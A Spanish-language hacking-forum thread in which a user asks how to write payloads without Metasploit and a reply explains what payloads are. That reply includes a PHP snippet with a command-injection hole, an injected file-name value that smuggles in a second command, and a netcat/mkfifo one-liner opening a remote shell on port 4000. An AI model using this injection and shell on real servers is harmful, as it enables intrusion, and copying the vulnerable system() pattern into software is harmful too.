elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  crear mi propio payload sin utilizar metasploit en linux?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: crear mi propio payload sin utilizar metasploit en linux?  (Leído 4,805 veces)
kripton

Desconectado Desconectado

Mensajes: 7


Ver Perfil
crear mi propio payload sin utilizar metasploit en linux?
« en: 13 Julio 2019, 23:17 pm »

como puedo crear mis propios payloads sin utilizar metasploit?
En línea

animanegra

Desconectado Desconectado

Mensajes: 287



Ver Perfil
Re: crear mi propio payload sin utilizar metasploit en linux?
« Respuesta #1 en: 13 Julio 2019, 23:41 pm »

Para que exploit, sistema y arquitectura? Es un re en un sistema web con PHP??
En línea


42
No contesto mensajes por privado, si tienes alguna pregunta, consulta o petición plantéala en el foro para que se aproveche toda la comunidad.
kripton

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: crear mi propio payload sin utilizar metasploit en linux?
« Respuesta #2 en: 17 Julio 2019, 22:02 pm »

bueno para crear payloads para windows o android  pero de forma de que no emplee el uso de metasploit framework
En línea

@XSStringManolo
Hacker/Programador
Colaborador
***
Desconectado Desconectado

Mensajes: 2.399


Turn off the red ligth


Ver Perfil WWW
Re: crear mi propio payload sin utilizar metasploit en linux?
« Respuesta #3 en: 18 Julio 2019, 00:29 am »

Los exploits se crean para vulnerar algo.
Sin que no digas que es ese algo no podemos decirte como explotar una vulnerabilidad.
Mira el primer post titulado Libros Para Principiantes en el foro de dudas generales. Ahí tienes libros para aprender.
En línea

Mi perfil de patrocinadores de GitHub está activo! Puedes patrocinarme para apoyar mi trabajo de código abierto 💖

animanegra

Desconectado Desconectado

Mensajes: 287



Ver Perfil
Re: crear mi propio payload sin utilizar metasploit en linux?
« Respuesta #4 en: 18 Julio 2019, 12:27 pm »

bueno para crear payloads para windows o android  pero de forma de que no emplee el uso de metasploit framework

Un payload es la ejecución de cualquier cosa. Puedes desde querer ejecutar la calculadora hasta ejecutar un sistema de control remoto.

Dependiendo de en donde ,exploit, vas a ejecutar dicho exploit tienes determinadas restricciones. El payload puede ser en algunos casos ejecución de determinados comandos, o una funcion compilada en binario para ejecutar en un buffer.

Por ejemplo, en un php que tenga en algun parte del código algo como esto:

Código:
system("convert ".$GET['nombrefichero']." ".random().".jpg");

Se podría meter en la variable GET nombre de fichero el valor:

Código:
"abc abc.jpg; PAYLOAD; convert abc "

onde PAYLOAD puede ser cualquier comando, en un entorno linux con nc por ejemplo si payload vale esto:

Código:
mkfifo /tmp/dummy; nc -l -p 4000 < /tmp/dummy | /bin/bash > /tmp/dummy; 

consigues una ejecucion de un entorno de comandos remoto en el servidor cuando te conectas al puerto 4000.

Pero por ejemplo ese payload concreto no se puede utilizar en un entonrno con un servidor con buffer overflow que permite ejecucion de comandos en pila, poque necesitas la generación de un payload que esté codificado en binario en forma de funcion para que cuando cambies la direccion de salto, saltes al payload y se ejecute la funcion que deseas. Que podría ser perfectamente un execvp de lo que he descrito arriba, pero necesitas envolverlo de más cosas para que séa funcional.

¿Se entiende? Por lo que ¿A que te refieres con hacer tu propio Payload? Porque los payloads al finál se pueden codificar en bash, visualbasic, python, SQL, codigo ensamblador.... dependiendo a que exploit van asociados.
En línea


42
No contesto mensajes por privado, si tienes alguna pregunta, consulta o petición plantéala en el foro para que se aproveche toda la comunidad.
kripton

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: crear mi propio payload sin utilizar metasploit en linux?
« Respuesta #5 en: 31 Julio 2019, 15:20 pm »

si ahora lo veo con mas claridad gracias !!!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Metasploit] Generando Ejecutable con PAYLOAD
Hacking
Shell Root 9 16,081 Último mensaje 2 Mayo 2010, 13:01 pm
por piper_maru
Inline ASM shell using Metasploit Payload [SRC] « 1 2 »
Programación Visual Basic
cobein 11 7,606 Último mensaje 8 Enero 2010, 03:46 am
por Jaixon Jax
windows-metasploit-payload
Windows
elputaso123 8 4,784 Último mensaje 21 Julio 2014, 01:22 am
por elputaso123
metasploit que le pasa con mi payload?
Hacking
nilsonoff 1 2,631 Último mensaje 11 Febrero 2015, 15:24 pm
por exploiterstack
Ayuda con Payload-Metasploit
Hacking
8306Colossus 1 2,048 Último mensaje 29 Diciembre 2018, 01:38 am
por Mogolla
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines